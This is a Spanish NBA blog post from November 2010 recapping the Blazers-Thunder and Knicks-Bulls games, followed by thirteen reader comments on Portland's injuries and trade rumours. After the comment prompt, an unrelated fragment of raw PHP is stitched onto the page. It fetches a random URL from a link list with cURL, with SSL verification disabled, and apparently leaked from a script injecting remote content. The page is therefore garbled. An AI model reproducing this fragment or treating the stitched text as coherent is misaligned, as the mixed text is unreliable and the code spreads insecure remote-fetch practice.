La Crónica (04/11/2010)

05 de November de 2010 por txusma

En las películas deportivas, el equipo humilde siempre gana, los grandes favoritos siempre pierden y si un equipo se conjura para dedicar el partido a un ser querido recientemente fallecido es imposible que se le escape la victoria. Pero esto es la vida real y los Blazers, a pesar del emotivo homenaje a Maurice Lucas, recientemente fallecido después de una larga lucha contra el cancer, no pudieron imponerse a los Thunder (107-106). El trabajo de Durant y Westbrook era ganar y ni las lágrimas ni el sentir de los aficionados les pudieron desviar de su objetivo. Entre los 2 anotaron 56 puntos y capturaron 22 rebotes en un partido que se decidió en la prórroga. Rudy Fernandez se quedó sin saltar a la cancha por problemas de última hora en la espalda, lo mismo que Fabricio Oberto que declinó jugar al no sentirse del todo bien debido a problemas cardiacos.

Y en Chicago, los Knicks se llevaron la victoria de la mano de sus 2 bases, Toney Douglas y Raymond Felton, y de Danilo Gallinari que recuperó la puntería después de 2 partidos desastrosos (120-112). Los Bulls fueron masacrados desde la línea de 3 (16 de 24) y Derrick Rose tuvo que ver los últimos 9 minutos desde el banquillo por decisión expresa de su entrenador. ¿Alguna explicación lógica?

PREMIOS

MVP – Sorpresa: Doble premio para Toney Douglas que lideró a NY con 30 puntos (9 de 14), 4 asistencias y 4 robos de balón. No está nada mal para un número 29 del draft.

Rookie: ¿Hay algún rookie en la sala? Los únicos que pueden levantar tímidamente la mano son Omer Asik (7 puntos y 5 rebotes) y Landry Fields (6 puntos, 3 rebotes y 1 asistencia).

Decepción: Cole Aldrich jugó 4 minutos y lo más que hizo fue deambular por la cancha. Mal, muy mal le van las cosas al ex de Kansas.

Esfuerzo en vano: Conseguir 24 puntos y repartir 14 asistencias no tiene porque significar la victoria. Y si no que lo digan a Derrick Rose que después de semejante esfuerzo se quedó a las puertas del éxito.

Comenta

13 comentarios a esta entrada

  1. L.Casei dice:
    #1

    Malos tiempos para ser de los Blazers, a pesar de que era el mejor arranque desde 1999/00 con 4-1.
    La derrota en la prórroga frente a los Thunder es dura por ser rival de División, en casa y frente a un equipo que venía con dudas y un récord de 2-2.
    Lo que ocurre en Portland es para analizar. Parecía imposible tener peor suerte que el año pasado, pero por el camino que vamos todo puede pasar.
    El propietario lleva muchos años luchando contra el cáncer. Una leyenda y asistente hasta el año pasado como Mo Lucas acaba de morir por la misma enfermedad (vejiga). Ahora sabemos que Oberto se retira del baloncesto por problemas de corazón a los pocos días de fichar. El rookie Elliot Williams se pierde la temporada tras lesionarse anteayer la rodilla, igual que Jeff Pendergraph, que ha tenido que ser cortado para la llegada de… Oberto. Qué decir de Oden y Przybilla, casi un año sin jugar… Rudy no jugó ayer por dolor de espalda, de nuevo. Diez disponibles y ocho en la rotación de anoche, con un solo pívot puro, y con 36 años. El récord, 4-2 tras perdonar Roy el último tiro antes de la prórroga. Habrían sido 5 victorias en 6 partidos, 4 de ellos fuera de casa. Increíble con la situación que vive el equipo. Enorme el trabajo de McMillan, que tiene que hacer auténticos encajes de bolillos.
    Cualquier equipo estaría hundido. Este, no.

      Citar

  2. TheDeerHunter dice:
    #2

    No… a este lo hunden. El trabajo de McMillan cojonudo… para hacer huir a los jugadores de talento que han pasado por el equipo. Este equipo no estaba hundido precísamente por lo bien que hizo las cosas Pritchard y por una plantilla extensísima. Ahora, como digo… cada vez menos extensísima y cada vez menos talento, pero como hay excusas.

    Por cierto. Si no me he informado mal, los problemas cardíacos de Oberto son definitivos. Y no es que declinara jugar anoche, sino que se retira. Gran tipo y excelente jugador FIBA el argentino.

      Citar

  3. scriers dice:
    #3

    Qué raro lo de Rudy y que raro lo de Portland. Yo hace un par de años sí lo veía un equipo temible si alcanzara su potencial. Ahora no. Creo que dependiendo de Miller y Camby en dirección e intimidación y con el chupón de Roy (que me recuerda un poco a Rudy Gay, y no lo digo en sentido peyorativo) como hombre estrella, no creo que vayan a alcanzar mucho más de lo que hacen. Tienen mimbres, pero cada vez menos, eso es cierto. Van menguando. Además, me resultan aburridos de ver. En cuanto a Oberto, siempre me ha parecido un jugador con buena o muy buena lectura del juego pero una muñeca regulera. Espero que le vaya bien.

      Citar

  4. sergio dice:
    #4

    Por cierto, Rose ya ha metido en 5 partidos la decima parte de los triples que metió en los 161 partidos anteriores. Mantiene un mal porcentaje pero al menos se decide a tirar…

      Citar

  5. TheDeerHunter dice:
    #5

    Por cierto, se especula con que la ausencia de Rudy tiene que ver con un posible traspaso. Lo han desmentido oficialmente, pero ya se sabe…

      Citar

  6. rojorob dice:
    #6

    Igual ya lo habeis visto, pero por si acaso. A mi me ha parecido chulo.

    http://www.nba.com/video/channels/nba_tv/2010/11/03/20101103_kobe_jumpers.nba/

      Citar

  7. diestro dice:
    #7

    Pues yo ahora mismo creo que el traspaso de Rudy puede estar mas cerca que nunca. Según tubasket y cito textualmente:
    “Al final, Oberto acabó en Portland, donde hoy mismo llegan cinco pívots, agentes libres, para intentar superar una prueba y convertirse en su recambio. Los elegidos son Sean Marks, Shavlik Randolph, Dwayne Jones, Earl Barron y Eric Boateng.”

    Viendo el panorama de lesiones en el juego interior de Portland y viendo los posibles recambios, creo que una operación con Rudy de por medio para traerse a un hombre grande de garantías (mínimas para un equipo como Portland) seria lo mejor y seguro que se están moviendo en ese sentido.

      Citar

  8. Txusma dice:
    #8

    Algún destino preferido y real para Rudy teniendo en cuenta las necesidades de Portland? En Chicago ahora hay exceso de escoltas y tras la aparición de Landry Fields, tampoco parece que los Knicks vayan a moverse mucho.

      Citar

  9. Denise dice:
    #9

    El equipo de Portland este año es peor que el del año pasado, y en parte, la culpa no es e McMillan, sino de Pritchard, que, lo mismo que formó un equipazo, lo está deshaciendo con sus traspasos. Si a esto le sumas, que Portland siempre tiene jugadores lesionados como Oden, Rudy, ahora también Przybilla…, yo no veo que McMillan esté haciendo tan mal su trabajo.
    Y por cierto, me encanta Batum, en 3 años será el alero más completo del mundo sólo por detrás de dos grandes monstruos como Lebron y Durant. Ojo!, no digo que tenga el talento de éstos 2, me refiero en el hecho de aportar tanto en todas las facetas del juego.

      Citar

  10. Scriers dice:
    #10

    Por cierto. Vaya evolucion de toney douglas. Que el año pasado era competidor de sergio rodriguez y ahora esta a años luz. Me parece un base extraño. Con capacidad para anotar pero que lo mismo lo hace a triples que en penetraciones. Algo cabeza loca pero con personalidad. Me gustaria ver como evoluciona.

      Citar

  11. troll dice:
    #11

    lo de Batum es una opinión muy persomal

      Citar

  12. TheDeerHunter dice:
    #12

    Denise, Pritchard hace tiempo que le tiraron y nada tiene que ver con lo que está pasando ahora.
    El que corta el bacalao allí está claro quién es.
    El trabajo de McMillan yo lo evaluo en base a los resultados pero sobre todo al juego y a lo que ha pasado con la plantilla con más potencial de la liga hace menos de dos años. En ese sentido lo que no entiendo es cómo lo podéis valorar positivamente.

      Citar

  13. aro_pasado_no_newtoniano dice:
    #13

    Lebron esta quedándose calvo o me lo parece a mí??

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>